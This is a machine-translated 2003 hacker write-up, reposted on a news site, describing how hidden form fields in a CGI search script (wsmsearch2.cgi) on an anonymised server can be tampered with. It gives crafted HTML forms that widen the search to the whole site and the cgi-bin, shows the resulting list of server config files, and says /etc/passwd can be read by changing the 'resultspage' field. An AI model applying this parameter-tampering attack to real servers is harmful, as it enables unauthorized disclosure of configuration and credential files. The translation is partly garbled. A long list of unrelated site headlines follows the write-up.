Leaking of information about the server through a hidden field html-code

Leaking of information about the server through a hidden field html-code
[2003/10/08, durito] How many times have talked about the dangers hidden in hidden forms, but still there are craftsmen who neglect it.
In a html-code index'noy www.xxx.com server pages have such a fragment: (unnecessary design elements removed)

 &lt;Form method = POST action = .. / .. / cgi-bin / wsmsearch2.cgi&gt; Search Site: &lt;input type = text name = terms size = 20&gt; &lt;input type = hidden name = boolean value = AND&gt; &lt;input type = hidden name = case value = Insensitive&gt; &lt;input type = hidden name = quicksearch value = NO&gt; &lt;input type = hidden name = max value = 50&gt; &lt;input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _
 http://www.xxx.com/ _ *. *
 manual / updates / _ http://www.xxx.com "&gt; &lt;input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html&gt; &lt;input type = submit value = Search!&gt;

as has become clear, it is the script search site system. but these lines are especially interesting:

 &lt;Input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _
 http://www.xxx.com/ _ *. *
 manual / updates / _ http://www.xxx.com "&gt; &lt;input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html&gt;

/opt2/xxx/httpd/htdocs - this is the way The installation site, but that's not all.
Search script takes its data from a hidden form:

 &lt;Input type = hidden name = boolean value = AND&gt; &lt;input type = hidden name = case value = Insensitive&gt; &lt;input type = hidden name = quicksearch value = NO&gt; &lt;input type = hidden name = max value = 50&gt; &lt;input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _
 http://www.xxx.com/ _ *. *
 manual / updates / _ http://www.xxx.com "&gt; &lt;input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html&gt;

that is, the search carried out in folders: manual/ updates/ and the root server folder http://www.xxx.com/ _ *.*
(it is interesting that this script was found poikovogo file: www_xxx_user_list.txt in the server root, it is a list of users).

so here it is possible to manipulate the query script. create html but with this code:

 &lt;Form method = POST action = .. / .. / .. / www.xxx.com/cgi-bin/wsmsearch2.cgi&gt;Search Site: &lt;input type = text name = terms size = 20&gt; &lt;input type = hidden name = boolean value = AND&gt; &lt;input type = hidden name = case value = Insensitive&gt; &lt;input type = hidden name = quicksearch value = NO&gt; &lt;input type = hidden name = max value = 50&gt; &lt;input type = hidden name = faqfile value = / opt2 / xxx / httpd / htdocs&gt; &lt;input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html&gt; &lt;input type = submit value = Search!&gt;

that is, just remove the lines: _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com and perform a search query on the entire site.
You can also search for files and /opt2/xxx/httpd/htdocs/cgi-bin/ :

 &lt;Form method = POST action = .. / .. / .. / www.xxx.com/cgi-bin/wsmsearch2.cgi&gt;Search Site: &lt;input type = text name = terms size = 20&gt; &lt;input type = hidden name = boolean value = AND&gt; &lt;input type = hidden name = case value = Insensitive&gt; &lt;input type = hidden name = quicksearch value = NO&gt; &lt;input type = hidden name = max value = 50&gt; &lt;input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs_
 http://www.xxx.com/ _ *. *
 cgi-bin / _ http://www.xxx.com "&gt; &lt;input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html&gt; &lt;input type = submit value = Search!&gt;

Now it has been found that as a result of these requests:

 Here are your search results for the keyword (s) conf.dont_use in order of
 relevance.

 1) conf.dont_use / srm.conf.old SIZE: 7354 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 2) conf.dont_use / srm.conf SIZE: 7436 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 3) conf.dont_use / sessiond.conf SIZE: 159 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 4) conf.dont_use / mime.types SIZE: 2652 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 5) conf.dont_use / imagemap.conf SIZE: 1062 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 6) conf.dont_use / httpsd.conf.dave SIZE: 43652 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 7) conf.dont_use / httpsd.conf.11-20-2001 SIZE: 43841 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 8) conf.dont_use / httpsd.conf-backup SIZE: 13243 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 9) conf.dont_use / httpsd.conf SIZE: 43927 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 10) conf.dont_use / httpd.conf.vhback SIZE: 7225 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 11) conf.dont_use / httpd.conf.11-20-2001 SIZE: 7451 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 12) conf.dont_use / httpd.conf SIZE: 7451 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0
 13) conf.dont_use / access.conf SIZE: 1725 bytes TYPE: Unknown
 Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0

and another script:

 Here are your search results for the keyword (s) securedata in order of
 relevance.

 1) cgi-bin / conf.dont_use / resetsecuredata.cgi SIZE: bytes TYPE: CGIssript
 Term: securedata Filename matches: 0,1 Title matches: 0,0 exact matches: 0
 partial matches: 0

Well-loved /etc/passwd is obtained quite simply: simply the value of the hidden field resultspage replaced by /etc/passwd .

This is how server administrators sometimes try to patch up all sorts of holes, nakatyvaya the latest patches, and the information leaked from a html-code.

your bug Durito
_________________
EAT THE RICH!

Copyright 2002-2003 by void.ru All rights reserved.

Liked? Subscribe to RSS news!
You can also support shram.kiev.ua, click:

Do not be amiss to your friends and find out this information, share with them the article!

All news

Site
Forum

Driving all the municipal transport in Kiev Photo 2017-02-28
How often should you have sex according to age Photo 2017-02-28
Calendar Fishing and fish forecast Peace / predatory fish for 2017. Photo 2017-02-26
Fishing knots how to tie a hook, preparing to fly Photo 2017-02-26
Euthanasia Coaster, a roller coaster project intended for the death penalty Photo 2017-02-26
WEB page may be evidence in court Photo 2017-02-26
In this cosplay you want to play yourself Photo 2017-02-25
Elegant collection of girls from Japan. Photo 2017-02-25
Paste GOI (from GOI - State Optical Institute) Photo 2.24.2017
Unnecessary things that should quickly get rid Photo 2017-02-24
Bad daily habits, because of which there is bloating Photo 2017-02-24
Control levers aircraft engines (ORE), you never know ... Photo 2/24/2017
Modern Design Business Card Photo 2017-02-23
Cats, artist Vladimir Rumyantsev Photo 2017-02-23
Interesting facts about the film Prometheus Photo 2017-02-23
As reported on the NASA conference? Photo 2017-02-21
SSL certificate format, how to convert a certificate in .pem, .cer, .crt, .der, pkcs or the pfx Photo 21/02/2017
Types of bleeding and first aid rules you need to know! Photo 2017-02-20
Early signs of diabetes, you must not ignore! Photo 2017-02-20
Household mistakes that kill the beauty of the interior Photo 2017-02-20
Serebro Group in Maxim magazine, March 2017 Photo 2017-02-20
As a matter of fact 2-3 day children see the world immediately after birth Photo 2017-02-18
Full guide shoes for men Photo 2017-02-18
Hijab, chador, burqa - what's the difference? Photo 2017-02-18
Effective yoga poses for a beautiful and resilient chest Photo 2017-02-15
How to parallel park? Photo 2017-02-15
Vegetable oils, information about each Photo 2017-02-13
Stereo Pictures (more than 127 pieces) + how they look Photo 2017-02-12
What time of day is best to eat certain foods Photo 2017-02-12
Ideas for creating clay toys from which children will be delighted Photo 2017-02-12
Dirty tricks that are used by all controllers and slippery people, you've already caught them hooked? Photo 2017-02-11

Driving all of Kiev municipal transport Scheme marked all bus, trolleybus and tram routes, and ... Photo 2017-02-28
How often should you have sex according to age Many people are curious to know, engage in sex, they are too many or too ... Photo 2017-02-28
Calendar Fishing and fish forecast Peace / predatory fish in 2017 There are certain phases of the light when you just need to be alone ... Photo 2017-02-26
Fishing knots how to tie a hook, preparing to fly Node Type selected according to the type of fishing line (monofilament or ... Photo 2017-02-26
Euthanasia Coaster, a roller coaster project intended for the death penalty The author acknowledges that roller coasters are not the optimal machine for ... Photo 2017-02-26
WEB page may be evidence in court should be understood that, for example, copyright does not itself violate the existing ... Photo 2017-02-26
In this cosplay, you will want to play basic games prototypes costume - cartoon characters, anime, video games, movies, ... Photo 2017-02-25
Elegant collection of girls from Japan. Japanese (Jap nihondzin / nippondzin, Nihon minzoku.) - The people, the main (over 98%) ... Photo 2017-02-25
Paste GOI (from GOI - State Optical Institute) GOI paste can be used for polishing of products from various ... Photo 2017-02-24
Unnecessary things that should quickly get rid Read reflection, in which you will learn how to let go of ... Photo 2017-02-24
Bad daily habits, because of which there is bloating believed that bloating - it is not a separate illness, but ... Photo 2017-02-24
Control levers aircraft engines (ORE), you never know ... Lever Engine Control (RUD) - powertrain management body aircraft ... Photo 2017-02-24
Modern Design Business Card tors card (card) - Traditional media contact information about a person ... Photo 2017-02-23
Cats, artist Vladimir Rumyantsev Vladimir Rumyantsev, born in 1957, began to paint at the age of ... Photo 2017-02-23
Interesting facts about the film Prometheus Who are we really? Where did come from and where ... Photo 2017-02-23
As reported on the NASA conference? Open 7 exoplanet system TRAPPIST-1 red dwarf; All ... Photo 2017-02-21
SSL certificate format, how to convert a certificate in .pem, .cer, .crt, .der, pkcs or pfx for successful installation and operation of SSL certificates across multiple platforms ... Photo 2017-02-21
Types of bleeding and first aid rules you need to know! The need for first aid for bleeding caused by a health hazard ... Photo 2017-02-20
Early signs of diabetes, you must not ignore! Diabetes is a very serious disease that causes a lot of dangerous ... Photo 2017-02-20
Household mistakes that kill the beauty of the interior No matter how much fuss over design in my apartment, I do not ... Photo 2017-02-20
Serebro Group in Maxim magazine, March 2017 Olga, Katya and Polina are eager to get married - it is ... Photo 2017-02-20

Cats. Painter Vladimir Rumyantsev. Photo 2017-02-23
"Prometheus" - Interesting Facts Photo 2017-02-23
Seen Lithuanian cheerleaders? Worth seeing! 02/23/2017
Olsen, Elizabeth / Elizabeth Olsen Photo 02.23.2017
She sat by the window, and he went into her car ... Photo 02.23.2017
Photo Cats, Cats, Kittens Photo 2017-02-23
How can run Turtle Photo 2017-02-23
Bengal Cat Talking With Kitten 23/02/2017
National Bank has issued a new coin (Photo) Photo 02.23.2017
Protasov Yar 30 years ago Photo 2017-02-23
Photo Animals Photo 2017-02-23
Translation NASA What is said at the Conference of Nasa Photo 23.02.2017
Something about the size of Jupiter, Races "Through" Sun Photo 2017-02-22
Central streets of Kiev will block for five days Photo 2017-02-20
3 Ways to Make People Vagina bottleneck and firmness Photo 2017-02-20
Monica Bellucci Gq Magazine in Italy, February 2017 Photo 2017-02-20
«Serebro» Group B Magazine Maxim, March 2017 Photo 2017-02-20
What to Do If you are detained by police - Article 146 Piracy Photo 2017-02-20
There is a new free OS Photo 2017-02-18
Wood under the electron microscope Photo 2017-02-18
Payment Card Market in 2016 showed significant growth Photo 2017-02-18

social

Your IP: 66.102.9.131
Your Country: United States
Your Region: California
Your City: Mountain View

Free 50 UAH for your Monobank card?